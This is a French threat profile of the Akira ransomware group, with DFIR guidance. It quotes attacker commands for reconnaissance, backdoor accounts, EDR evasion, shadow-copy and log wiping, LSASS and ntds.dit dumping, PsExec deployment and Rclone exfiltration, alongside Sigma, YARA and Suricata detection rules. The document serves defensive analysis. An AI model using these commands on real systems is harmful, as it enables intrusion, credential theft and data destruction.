Profil de menace : syndicat ransomware Akira et guide d'investigation DFIR de référence
HERMES THREAT SCORE & EXPLOITABILITÉ OPÉRATIONNELLE
Cible :Infrastructures d'Entreprise, Active Directory Windows & Hyperviseurs VMware ESXi Évalué à 94 EXTREME par Hermes en raison de son rythme opérationnel soutenu, de l'armement systématique de failles sur les passerelles de périmètre (SonicWall, Cisco), de la destruction ciblée d'hyperviseurs (VMware ESXi, Nutanix AHV), de l'évasion au niveau noyau par pilotes vulnérables (BYOVD) et d'une double extorsion implacable.
Akira Ransomware SyndicateACTEUR DE MENACE
1. Profil de l’acteur de la menace, origines et filiation avec Conti
Section intitulée « 1. Profil de l’acteur de la menace, origines et filiation avec Conti »Genèse opérationnelle et modèle RaaS
Section intitulée « Genèse opérationnelle et modèle RaaS »Akira a émergé en mars 2023, comblant rapidement le vide opérationnel créé par la dissolution des cartels Conti et Hive. Fonctionnant selon un modèle d’affiliation, l’équipe centrale de développeurs fournit le portail de négociation, les rançongiciels multi-plateformes, l’infrastructure de publication de données et la chaîne d’outils d’exfiltration, tandis que des affiliés spécialisés réalisent la pénétration du réseau, l’élévation de privilèges et le déplacement latéral.
Les demandes de rançon varient de 200 000 à plus de 10 000 000 USD en Monero (XMR) et Bitcoin (BTC), calibrées en fonction du chiffre d’affaires annuel de la victime déduit des bilans financiers dérobés lors de l’exfiltration.
Filiation et Infrastructure du Syndicat Akira :
┌─────────────────────────────────────────────────────────────┐ │ Fragmentation du Cartel Conti (Mai 2022) │ │ - Code source de Conti v2 divulgué │ │ - Algorithmes partagés ChaCha20/RSA et logique d'injection │ └──────────────────────────────┬──────────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────┐ │ Émergence d'Akira (Mars 2023 - Présent) │ │ ├── Chiffreur Windows (C++ / Multi-threadé) │ │ ├── Chiffreur Linux / VMware ESXi (ELF64 / Threads POSIX) │ │ ├── Variante « Megazord » (Rust / Chargeurs PowerShell) │ │ └── Module pour Nutanix AHV (Fin 2025/2026) │ └──────────────────────────────┬──────────────────────────────┘ │ ┌──────────────────────────┴──────────────────────────┐ ▼ ▼┌──────────────────────────────┐ ┌─────────────────────────────────────┐│ Portail Tor Rétro Années 80 │ │ Référentiel de Fuite (Double Ext.) ││ - Chat de négociation dédié │ │ - Dépôts Mega.nz, Wasabi, pCloud ││ - Portefeuilles partagés │ │ - Ventes aux enchères publiques │└──────────────────────────────┘ └─────────────────────────────────────┘Preuves forensiques de la filiation avec Conti
Section intitulée « Preuves forensiques de la filiation avec Conti »La décompilation approfondie des binaires réalisée par les laboratoires d’Arctic Wolf, Sophos X-Ops et la CISA (avis AA24-109A) confirme la réutilisation directe du code source de Conti v2 :
- Identité de la couche cryptographique : la dérivation de clé ChaCha20, la génération du vecteur d’initialisation (IV) via l’API CryptoAPI et l’encapsulation RSA reproduisent les routines de Conti au niveau de l’octet.
- Obscurcissement de chaînes et hachage d’API : Akira emploie les mêmes algorithmes d’assemblage de chaînes sur la pile et de résolution dynamique d’API Windows (
VirtualAlloc,CreateFileW,CryptAcquireContextW), masquant ainsi sa table des importations (IAT). - Agrégat de portefeuilles blockchain : les flux de traçage de cryptomonnaies montrent des adresses de portefeuilles et des nœuds de mixage communs entre les rançons historiques de Conti et les premiers paiements perçus par Akira.
2. Cycle de vie MITRE ATT&CK complet et TTPs détaillées
Section intitulée « 2. Cycle de vie MITRE ATT&CK complet et TTPs détaillées »Une intrusion menée par Akira obéit à une séquence d’actions rigoureusement planifiée :
Chaîne d'Attaque Bout en Bout d'Akira :
[1. Accès Initial] ──► Exploitation Cisco ASA (CVE-2023-20269) ou SonicWall (CVE-2024-40766 / CVE-2026-83548) │[2. Vivre sur l'Herbe] ──► Déploiement AnyDesk / RustDesk / Ngrok ; audit AD avec AdFind & SharpHound │[3. Élévation de Priv.]──► Chargeur POORTRY / Pilote vulnérable BYOVD (zam.sys) pour tuer les capteurs EDR │[4. Vol d'Identifiants]──► Vidage de LSASS (Mimikatz / ProcDump) ; extraction de NTDS.dit via ntdsutil │[5. Déplacement Lat.] ──► Rebond RDP (mstsc), WMI et PsExec vers les contrôleurs de domaine et nœuds ESXi │[6. Exfiltration] ──► Archivage 7-Zip ; exfiltration furtive via Rclone masqué vers Mega.nz/Wasabi │[7. Impact / Chiffre] ──► Arrêt des VM (esxcli/vim-cmd) ; suppression des ombres ; chiffreur ChaCha20/RSAAccès initial (TA0001)
Section intitulée « Accès initial (TA0001) »Le groupe contourne généralement l’hameçonnage classique pour frapper directement le périmètre externe :
- Vulnérabilités d’équipements Cisco ASA / FTD : exploitation intensive de la faille
CVE-2023-20269permettant le bourrage d’identifiants et le contournement de l’authentification multifacteur sur les passerelles VPN. - Compromission de passerelles SonicWall : exploitation massive des failles
CVE-2024-40766etCVE-2026-83548(SSRF et injection de commandes sur SonicWall SMA1000) pour s’infiltrer et dérober les comptes de synchronisation Active Directory LDAP. - Failles de VPN SSL Fortinet FortiOS : utilisation des failles
CVE-2026-22708etCVE-2024-21762pour exécuter du code à distance sur le concentrateur de télétravail. - Ciblage de l’infrastructure de sauvegarde Veeam : exploitation de
CVE-2023-27532etCVE-2024-40711afin d’anéantir les sauvegardes avant le déclenchement du chiffreur. - Achat d’accès auprès des courtiers (IAB) : achat de jetons de session et de sessions RDP volées auprès des courtiers d’accès initial (IAB).
Découverte et cartographie interne (TA0007)
Section intitulée « Découverte et cartographie interne (TA0007) »Dès l’accès interne validé, les opérateurs lancent une cartographie automatisée du domaine :
- Interrogation de l’annuaire avec AdFind :
Fenêtre de terminal adfind.exe -f "(objectcategory=person)" > users.txtadfind.exe -f "(objectcategory=computer)" > computers.txtadfind.exe -f "(objectcategory=group)" > groups.txtadfind.exe -gcb -sc trustdmp > trust_topology.txt - Analyse de chemins avec BloodHound : exécution de
SharpHound.exepour tracer le chemin d’attaque le plus court vers le groupe Administrateurs du Domaine. - Scanners de sous-réseaux : emploi de
Advanced_IP_Scanner.exe,netscan.exe(SoftPerfect) etAngry IP Scannerpour localiser les serveurs de bases de données, les partages de fichiers et les interfaces de gestion VMware ESXi. - Commandes système natives (living-off-the-land) :
Fenêtre de terminal net view /all /domainnltest /dclist:ENTREPRISEnet group "Domain Admins" /domainwmic computersystem get domain,name,username
Persistance et commande-et-contrôle (TA0003 & TA0011)
Section intitulée « Persistance et commande-et-contrôle (TA0003 & TA0011) »Pour éviter les détections de balisage réseau (beaconing), Akira privilégie des logiciels d’administration légitimes :
- Outils de télégestion (RMM) :
- AnyDesk : déployé silencieusement en ligne de commande (
AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent) avec mot de passe d’accès autonome préconfiguré dansservice.conf. - RustDesk et splashtop : déployés en relais de secours.
- AnyDesk : déployé silencieusement en ligne de commande (
- Tunnels et relais inversés :
- Ngrok : exposition du port RDP 3389 sur Internet via un tunnel sortant (
ngrok.exe tcp 3389). - Cloudflare tunnels (
cloudflared.exe) et Chisel : Évasion des pare-feux d’inspection de trafic.
- Ngrok : exposition du port RDP 3389 sur Internet via un tunnel sortant (
- Création de comptes locaux clandestins :
Fenêtre de terminal net user backup_admin P@ssw0rd2026! /addnet localgroup Administrators backup_admin /addnet localgroup "Remote Desktop Users" backup_admin /add
Élévation de privilèges et évasion de défense (TA0004 & TA0005)
Section intitulée « Élévation de privilèges et évasion de défense (TA0004 & TA0005) »Utilisation de pilotes vulnérables (BYOVD) via POORTRY
Section intitulée « Utilisation de pilotes vulnérables (BYOVD) via POORTRY »Les affiliés d’Akira exploitent le chargeur POORTRY pour installer des pilotes en mode noyau signés mais vulnérables (zam.sys de Zemana, gdrv.sys de GIGABYTE ou procexp.sys) :
- Enregistrement d’un service noyau :
sc create zam_driver type= kernel binPath= C:\Windows\Temp\zam.sys. - Le pilote expose des fonctions de lecture/écriture arbitraires en mémoire noyau via des appels IOCTL.
- Exécuté en ring 0, POORTRY parcourt la liste des processus
EPROCESSet termine sans sommation les processus et pilotes de filtrage des agents EDR (CrowdStrike, SentinelOne, Defender for Endpoint, Sophos, Trend Micro).
Démarrage forcé en mode sans échec
Section intitulée « Démarrage forcé en mode sans échec »Pour neutraliser les solutions de sécurité résistant au meurtre en espace utilisateur, Akira reconfigure Windows afin de démarrer en mode sans échec avec prise en charge réseau :
bcdedit /set {current} safeboot networkshutdown /r /f /t 00La majorité des capteurs EDR n’ayant pas leurs services configurés pour s’exécuter dans cette configuration (HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network), le rançongiciel dispose du champ libre.
Destruction des sauvegardes, neutralisation de Veeam et purge des journaux
Section intitulée « Destruction des sauvegardes, neutralisation de Veeam et purge des journaux »:: Suppression des clichés instantanés de volume (VSS)vssadmin.exe delete shadows /all /quietwmic shadowcopy delete
:: Suppression du catalogue de sauvegarde Windowswbadmin delete catalog -quietwbadmin delete systemstatebackup -keepVersions:0
:: Désactivation de l'environnement de récupération et de la réparation automatiquebcdedit /set {default} bootstatuspolicy ignoreallfailuresbcdedit /set {default} recoveryenabled no
:: Purge des journaux d'événements Windowswevtutil cl Securitywevtutil cl Systemwevtutil cl Applicationwevtutil cl "Windows PowerShell"wevtutil cl "Microsoft-Windows-Sysmon/Operational"Lors des intrusions d’entreprise, les opérateurs d’Akira s’attaquent spécifiquement aux serveurs Veeam Backup & Replication (en exploitant les vulnérabilités CVE-2023-27532 et CVE-2024-40711) afin de dérober les mots de passe des hyperviseurs et d’ordonner la purge complète des dépôts (Remove-VBRBackup -FromDisk) avant de déployer leur chiffreur Linux ESXi. Pour une analyse approfondie de ce vecteur, consultez notre dossier sur l’Architecture et paysage des menaces Veeam.
Accès aux identifiants et mouvement latéral (TA0006 & TA0008)
Section intitulée « Accès aux identifiants et mouvement latéral (TA0006 & TA0008) »- Vidage de la mémoire LSASS :
- Exécution de Mimikatz (
sekurlsa::logonpasswords). - Vidage discret via ProcDump de Sysinternals :
procdump.exe -ma lsass.exe C:\Windows\Temp\lsass.dmp. - Appel direct de l’API
comsvcs.dll:Fenêtre de terminal rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID_LSASS> C:\Windows\Temp\lsass.dmp full
- Exécution de Mimikatz (
- Extraction de la base Active Directory ntds.dit :
Fenêtre de terminal ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_dump" q q - Attaques Kerberoasting et AS-REP Roasting : sollicitation des tickets TGS des comptes de service via
Rubeus.exepour les casser hors-ligne. - Progression latérale :
- Protocole RDP : rebond interactif via
mstsc.exe(Événement Windows 4624, Logon Type 10). - PsExec et appels WMI : déploiement et exécution de la charge utile sur l’ensemble des postes et serveurs du domaine :
Fenêtre de terminal psexec.exe \\<IP_CIBLE> -u <DOMAINE>\<ADMIN> -p <MOT_DE_PASSE> -d -c C:\Windows\Temp\akira.exe -s 100wmic /node:<IP_CIBLE> /user:<ADMIN> /password:<MOT_DE_PASSE> process call create "cmd.exe /c C:\Windows\Temp\akira.exe"
- Protocole RDP : rebond interactif via
Collecte et exfiltration pour double extorsion (TA0009 & TA0010)
Section intitulée « Collecte et exfiltration pour double extorsion (TA0009 & TA0010) »- Préparation des archives : compression avec WinRAR ou 7-Zip, avec chiffrement des archives pour tromper les capteurs DLP :
Fenêtre de terminal rar.exe a -hpP@ssw0rd123 -m1 -r C:\Windows\Temp\exfil_finance.rar "D:\Finance\*" - Outil d’exfiltration Rclone :
Akira emploie systématiquement Rclone, fréquemment renommé pour usurper des binaires système :
- Chemins observés :
C:\Windows\Temp\svchost.exe,C:\ProgramData\system.exe,C:\Users\Public\taskhost.exe. - Exécution avec un fichier de configuration dédié (
rclone.conf) pointant vers des espaces cloud :Fenêtre de terminal svchost.exe copy "D:\DonneesEntreprise" "remote:bucket_exfil" --transfers 16 --checkers 16 --no-check-certificate --config C:\Windows\Temp\rclone.conf - Cibles d’hébergement : Mega.nz, Wasabi Cloud Storage, pCloud et serveurs SFTP dédiés.
- Chemins observés :
3. Anatomie du moteur cryptographique et rétro-ingénierie
Section intitulée « 3. Anatomie du moteur cryptographique et rétro-ingénierie »Akira dispose de deux variantes de chiffreur : un binaire en C++ pour Windows et un binaire ELF 64 bits pour les hyperviseurs Linux et VMware ESXi.
Pipeline Cryptographique d'Akira & Chiffrement Intermittent :
Évaluation de la Taille du Fichier : ┌─────────────────────────────────────────────────────────────┐ │ Contrôle de la taille et de l'extension (.akira ajouté) │ └──────────────────────────────┬──────────────────────────────┘ │ ┌────────────────────────┼────────────────────────┐ ▼ ▼ ▼ Taille < 2 Mo 2 Mo <= Taille <= 100 Mo Taille > 100 Mo┌──────────────────┐ ┌─────────────────────────┐ ┌─────────────────────────┐│ Chiffrement Total│ │ Chiffrement par Étapes │ │ Chiffrement des En-têtes││ 100% des octets │ │ Chiffre 1 bloc, saute N │ │ Chiffre les premiers ││ chiffrés avec le │ │ blocs selon le flag -n %│ │ blocs et quelques Mo ││ flux ChaCha20 │ │ (Par défaut : 50%) │ │ de structures VMFS/NTFS │└──────────────────┘ └─────────────────────────┘ └─────────────────────────┘ │ │ │ └────────────────────────┼────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────┐ │ Écriture du Pied de Page (Footer) en Fin de Fichier : │ │ 1. Clé ChaCha20 (256 bits) et Nonce (96 bits) │ │ 2. Encapsulés avec la Clé Publique RSA-4096 des attaquants │ │ 3. Signature Magique : 0x24 0x61 0x6B 0x69 ("$aki") │ └─────────────────────────────────────────────────────────────┘1. Cryptographie hybride : ChaCha20 + RSA-4096
Section intitulée « 1. Cryptographie hybride : ChaCha20 + RSA-4096 »- Chiffrement symétrique (ChaCha20) : contrairement aux rançongiciels historiques utilisant AES, Akira utilise le chiffreur de flux ChaCha20, offrant une vélocité de chiffrement supérieure sans dépendre des instructions matérielles AES-NI. Chaque fichier reçoit une clé symétrique unique de 256 bits et un nonce de 96 bits générés via
CryptGenRandom. - Protection asymétrique (RSA-4096) : la clé symétrique et le nonce sont immédiatement encapsulés à l’aide d’une clé publique RSA-4096 intégrée dans le code du binaire.
- Structure du pied de page (footer) : les métadonnées chiffrées sont écrites à la fin du fichier, suivies d’une marque magique de 4 octets (
0x24 0x61 0x6B 0x69, chaîne"$aki"). Sans la clé privée détenue par les attaquants, le déchiffrement mathématique est impossible.
2. Algorithme de chiffrement intermittent
Section intitulée « 2. Algorithme de chiffrement intermittent »Afin de déjouer les heuristiques de détection de comportement d’E/S disque des EDR, Akira implémente un chiffrement intermittent réglable :
- Fichiers inférieurs à 2 mo : chiffrement intégral.
- Fichiers entre 2 mo et 100 mo : chiffrement d’un bloc sur deux en fonction de l’argument
-n(ex.-n 50chiffre 50 % des blocs). - Fichiers volumineux et disques virtuels (> 100 mo) : chiffrement des premiers mégaoctets et de quelques blocs intermittents. Cette approche corrompt instantanément les systèmes de fichiers (NTFS, VMFS) et les bases de données tout en réduisant le temps d’exécution à quelques secondes par téraoctet.
3. Matrice des arguments en ligne de commande
Section intitulée « 3. Matrice des arguments en ligne de commande »| Argument | Windows | Linux / ESXi | Rôle opérationnel et mécanique |
|---|---|---|---|
-p <chemin> | Oui | Oui | Cible un dossier précis, un fichier ou une banque de données VMFS (ex. -p /vmfs/volumes/Datastore1/). |
-s | Non | Oui | Arrêt des machines virtuelles : Invoque esxcli et vim-cmd pour forcer l’extinction des machines virtuelles avant chiffrement. |
-n <pourcent> | Oui | Oui | Ratio de chiffrement : Pourcentage de blocs chiffrés par fichier (ex. -n 50). |
-fork <nb> | Oui | Oui | Parallélisation : Nombre de threads ou de sous-processus alloués au chiffrement simultané. |
-share <nom> | Oui | Non | Cible un partage réseau SMB spécifique du domaine. |
4. Spécificités de la charge utile Linux et VMware ESXi
Section intitulée « 4. Spécificités de la charge utile Linux et VMware ESXi »Le binaire Linux est un exécutable ELF 64 bits. Déployé sur les hyperviseurs ESXi via SSH ou vCenter :
- Énumération des machines virtuelles :
Fenêtre de terminal vim-cmd vmsvc/getallvms | awk '{print $1}' - Arrêt forcé des processus :
Pour libérer les verrous sur les fichiers de disques virtuels :
Fenêtre de terminal vim-cmd vmsvc/power.off <ID_VM>esxcli vm process kill --type=force --world-id=<WORLD_ID> - Chiffrement des banques de données (
/vmfs/volumes/) : Ciblage spécifique des extensions :.vmdk(disque virtuel).vmem(fichier de pagination mémoire).vmx/.vmxf(configuration de la machine virtuelle).vmsn/.vmsd(instantanés/snapshots).nvram(BIOS/UEFI virtuel)
- Renommage et dépôt de la note :
Les fichiers reçoivent l’extension
.akiraet la noteakira_readme.txtest déposée à la racine de chaque banque de données.
4. Campagnes réelles à fort impact et télémétrie des attaques
Section intitulée « 4. Campagnes réelles à fort impact et télémétrie des attaques »1. Attaque des centres de données de tietoevry (janvier 2024)
Section intitulée « 1. Attaque des centres de données de tietoevry (janvier 2024) »- Cible : tietoevry, géant nordique des services d’hébergement cloud en Suède et Finlande.
- Vecteur : compromission d’équipements de virtualisation et de passerelles de périmètre.
- Conséquences : chiffrement de grappes complètes de serveurs, entraînant l’interruption des services de l’agence suédoise de l’emploi, du système fiscal, de pharmacies hospitalières et de plus de 120 portails municipaux.
2. Intrusion chez nissan oceania (fin 2023)
Section intitulée « 2. Intrusion chez nissan oceania (fin 2023) »- Cible : filiale régionale de Nissan Motor Corporation en Australie et Nouvelle-Zélande.
- Conséquences : pénétration via un accès VPN sans MFA, vol de plus de 100 gigaoctets de données et chiffrement des serveurs. Les données personnelles et financières de plus de 100 000 individus ont été publiées sur le site Tor du groupe.
3. Campagnes massives sur VPN SonicWall (2024 – 2026)
Section intitulée « 3. Campagnes massives sur VPN SonicWall (2024 – 2026) »- Télémétrie : les équipes DFIR ont documenté une exploitation massive des failles
CVE-2024-40766etCVE-2026-83548, avec un temps de séjour (dwell time) moyen inférieur à 36 heures entre l’accès initial et le chiffrement généralisé.
5. Guide d’investigation DFIR pour les analystes de réponse à incident
Section intitulée « 5. Guide d’investigation DFIR pour les analystes de réponse à incident »Face à une attaque suspectée d’Akira, l’équipe d’intervention doit suivre une méthodologie d’investigation stricte :
-
Confinement d’urgence et coupure du périmètre :
- Déconnecter immédiatement l’ensemble des accès VPN externes (SonicWall, Cisco, Fortinet).
- Couper les flux sortants vers Internet pour bloquer les transferts Rclone en cours.
- Isoler les interfaces réseau des hôtes VMware ESXi et vCenter pour empêcher la destruction des VM.
- Procéder à une double réinitialisation du mot de passe KRBTGT sur l’Active Directory pour invalider tous les tickets Kerberos forgés.
-
Préservation de la mémoire vive (fenêtre cryptographique cruciale) :
- Ne jamais redémarrer OU éteindre précipitamment les serveurs chiffrés.
- Si un serveur est en cours de chiffrement, capturer la mémoire vive (WinPmem, DumpIt, capture de snapshot hyperviseur). Les clés de sous-flux ChaCha20 résidant temporairement en RAM, cette capture peut permettre la récupération des données.
-
Analyse des journaux d’accès périmétriques :
- Extraire et auditer les logs VPN Cisco ASA (
%ASA-6-113019), SonicWall et Fortinet. - Identifier les adresses IP sources anormales, les sessions sans MFA et les anomalies de voyage impossible (impossible travel).
- Extraire et auditer les logs VPN Cisco ASA (
-
Traque des artefacts forensiques sur les postes et serveurs :
- Examiner les fichiers Prefetch et l’Amcache à la recherche de traces de
rclone.exe,mimikatz.exe,adfind.exeet des outils RMM. - Analyser les journaux d’événements Windows (4624 type 10) pour retracer les rebonds RDP.
- Interroger la base SRUM (srudb.dat) pour mesurer les volumes précis de données exfiltrées par les binaires détournés.
- Examiner les fichiers Prefetch et l’Amcache à la recherche de traces de
-
Investigation sur les hyperviseurs VMware ESXi :
- Se connecter directement via la console physique ou IPMI/iLO.
- Examiner
/var/log/shell.loget/var/log/auth.logpour repérer les sessions SSH illégitimes et/var/log/vmkernel.logpour les arrêts forcés de machines virtuelles.
Matrice des artefacts forensiques Windows critiques
Section intitulée « Matrice des artefacts forensiques Windows critiques »| Emplacement de l’artefact | Composant système | Rôle dans l’enquête Akira |
|---|---|---|
C:\Windows\Prefetch\*.pf | Gestionnaire mémoire | Prouve l’exécution, l’horodatage, le compteur et les DLL associées à RCLONE.EXE, ANYDESK.EXE, MIMIKATZ.EXE et AKIRA.EXE. |
C:\Windows\appcompat\Programs\Amcache.hve | Compatibilité applicative | Enregistre l’empreinte SHA-1, la date de compilation et le chemin complet des exécutables d’attaque. |
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache | Registre (Shimcache) | Atteste de la présence passée et du chemin de scripts malveillants même s’ils ont été supprimés du disque. |
C:\Windows\System32\sru\SRUDB.dat | Base de données SRUM | Preuve formelle d’exfiltration : Mesure avec exactitude les octets émis par application, démontrant si un faux svchost.exe a envoyé des gigaoctets vers l’extérieur. |
C:\Users\<USER>\AppData\Roaming\AnyDesk\ | Journaux AnyDesk | Contient connection_trace.txt et ad.trace avec les identifiants distants des attaquants, la durée des sessions et les transferts de presse-papiers. |
C:\Windows\Temp\rclone.conf | Configuration Rclone | Dévoile les noms des buckets cloud, clés d’accès et hébergeurs distants utilisés pour l’exfiltration. |
6. Suite d’ingénierie de la détection et traque des menaces
Section intitulée « 6. Suite d’ingénierie de la détection et traque des menaces »title: Exécution du rançongiciel Akira et destruction des sauvegardesid: 3c8e9b41-1192-4f8a-9214-akira001-frstatus: stabledescription: Détecte les exécutions caractéristiques d'Akira incluant la suppression des clichés instantanés, la désactivation de la récupération et les drapeaux de commande typiques.author: Hermes Codex CTIdate: 2026-09-08references: - Avis CISA AA24-109Atags: - attack.impact - attack.t1486 - attack.t1490 - attack.defense_evasion - attack.t1070.001logsource: category: process_creation product: windowsdetection: selection_shadows: CommandLine|contains|all: - 'vssadmin' - 'delete' - 'shadows' selection_wmic: CommandLine|contains|all: - 'wmic' - 'shadowcopy' - 'delete' selection_bcdedit: CommandLine|contains|all: - 'bcdedit' - 'bootstatuspolicy' - 'ignoreallfailures' selection_akira_flags: CommandLine|contains: - ' -n ' - ' -s ' - ' -fork ' - ' -share ' selection_wevtutil: CommandLine|contains|all: - 'wevtutil' - 'cl' - 'Security' condition: 1 of selection_*falsepositives: - Tests exceptionnels de reprise d'activité (valider le compte utilisateur et le ticket de changement).level: criticaltitle: Exécution de Rclone usurpant un binaire systèmeid: 7f1a4e23-8821-42cb-b103-akiraexfil002-frstatus: stabledescription: Détecte l'exécution de l'outil Rclone dissimulé sous le nom d'un exécutable Windows légitime (svchost, taskhost, system).author: Hermes Codex CTIdate: 2026-09-08references: - Avis CISA AA24-109Atags: - attack.exfiltration - attack.t1567.002 - attack.defense_evasion - attack.t1036.003logsource: category: process_creation product: windowsdetection: selection_process: CommandLine|contains: - 'copy ' - 'sync ' - 'rclone' - '--transfers' - '--config ' - 'mega:' - 'wasabi:' - 'pcloud:' selection_masquerade: Image|endswith: - '\svchost.exe' - '\taskhost.exe' - '\system.exe' - '\rundll32.exe' Image|contains: - 'C:\Windows\Temp\' - 'C:\ProgramData\' - 'C:\Users\Public\' condition: selection_process and selection_masqueradefalsepositives: - Aucun faux positif attendu pour des binaires natifs exécutant des paramètres Rclone depuis des dossiers temporaires.level: criticalrule Ransomware_Win32_Akira { meta: description = "Détecte les binaires PE du rançongiciel Akira pour Windows" author = "Hermes Codex CTI" date = "2026-09-08" reference = "Avis CISA AA24-109A" threat_actor = "Akira" score = 95 strings: $str_note1 = "akira_readme.txt" ascii wide $str_note2 = "Hi Friends," ascii wide $str_note3 = "Dealing with us you will save your time" ascii wide $str_ext = ".akira" ascii wide
$param1 = "-p " ascii $param2 = "-n " ascii $param3 = "-fork " ascii $param4 = "-share " ascii
$chacha_const = "expand 32-byte k" ascii $rsa_pem = "-----BEGIN PUBLIC KEY-----" ascii condition: uint16(0) == 0x5A4D and (3 of ($str_*) or (all of ($param*) and $chacha_const) or ($str_note1 and $rsa_pem))}rule Ransomware_Linux_Akira_ESXi { meta: description = "Détecte les binaires ELF 64 bits d'Akira ciblant VMware ESXi" author = "Hermes Codex CTI" date = "2026-09-08" reference = "Avis CISA AA24-109A / Sophos X-Ops" threat_actor = "Akira" score = 95 strings: $elf_magic = { 7F 45 4C 46 02 01 01 } $esx_cmd1 = "esxcli vm process kill --type=force" ascii $esx_cmd2 = "vim-cmd vmsvc/power.off" ascii $esx_cmd3 = "vim-cmd vmsvc/getallvms" ascii $target_dir = "/vmfs/volumes" ascii $target_ext1 = ".vmdk" ascii $target_ext2 = ".vmx" ascii $note_name = "akira_readme.txt" ascii $chacha_k = "expand 32-byte k" ascii condition: $elf_magic at 0 and ($target_dir and $note_name) and (2 of ($esx_cmd*) or 2 of ($target_ext*) or $chacha_k)}index=endpoint sourcetype="XmlWinEventLog:Security" EventCode=4624 LogonType=10| eval SourceIP=coalesce(IpAddress, WorkstationName)| where SourceIP!="127.0.0.1" AND SourceIP!="-"| stats count earliest(_time) as premier_vu latest(_time) as dernier_vu values(TargetUserName) as utilisateurs_cibles by Computer, SourceIP| sort - countalert tcp $HOME_NET any -> $EXTERNAL_NET 9001 ( msg:"HERMES-CODEX - Connexion Akira vers relai Tor / négociation"; flow:established,to_server; content:"torproject.org"; nocase; classtype:trojan-activity; sid:202610901; rev:1; reference:cve,2026-83548;)7. Liens croisés : écosystème de menaces et matrice d’investigation
Section intitulée « 7. Liens croisés : écosystème de menaces et matrice d’investigation »| Dimension d’investigation | Dossier Codex / Outil | Synergies DFIR |
|---|---|---|
| Playbook d’incident | Playbook d’investigation de ransomware | Méthodologie complète de confinement, d’acquisition de mémoire et de reconstruction de parc. |
| Mouvement latéral | Mouvement latéral : SMB vs RDP | Traque des rebonds réseau, corrélation des événements 4624 Type 10 / Type 3 et traces PsExec. |
| Vol d’identifiants | Attaques sur identifiants Active Directory | Investigation sur les vidages de LSASS, le Kerberoasting et l’extraction de NTDS.dit. |
| Failles de passerelles | CVE-2026-83548 : SSRF SonicWall SMA1000 | Analyse technique de la vulnérabilité de passerelle prioritairement ciblée par les affiliés d’Akira. |
| Failles de passerelles | CVE-2026-22708 : RCE Fortinet FortiOS | Mécanisme d’exploitation des failles de périmètre exploitées pour l’accès initial en entreprise. |
| Profil de menace | Courtiers d’accès initial (IAB) | Compréhension des places de marché souterraines fournissant les accès VPN aux affiliés. |
| Neutralisation de sauvegarde | Architecture et paysage des menaces Veeam | Analyse détaillée de la militarisation des failles Veeam par Akira et des procédures d’effacement de dépôts. |
| Ransomware homologue | Ransomware Qilin | Comparaison opérationnelle avec Qilin, autre acteur ciblant agressivement les hyperviseurs. |
| Studio interactif | AgentThreat Studio | Modélisation des périmètres réseau et simulation des scénarios de compromission d’infrastructure. |
Sources et références techniques à haute fiabilité
Section intitulée « Sources et références techniques à haute fiabilité »- CISA, FBI & Europol (EC3) : avis conjoint de cybersécurité AA24-109A : #StopRansomware - Akira Ransomware
- SentinelOne (SentinelLabs) : dossier de renseignement Akira : TTPs, lignée Conti et chiffreur Linux ESXi
- Arctic Wolf Labs : analyse forensique du rançongiciel Akira et compromission des accès distants
- Trend Micro Research : dissection technique et profil de menace : Ransomware Spotlight Akira
- Check Point Research : architecture RaaS et analyse du rançongiciel Akira
- Référentiel MITRE ATT&CK : groupe G1024 : cartographie des techniques ATT&CK associées à Akira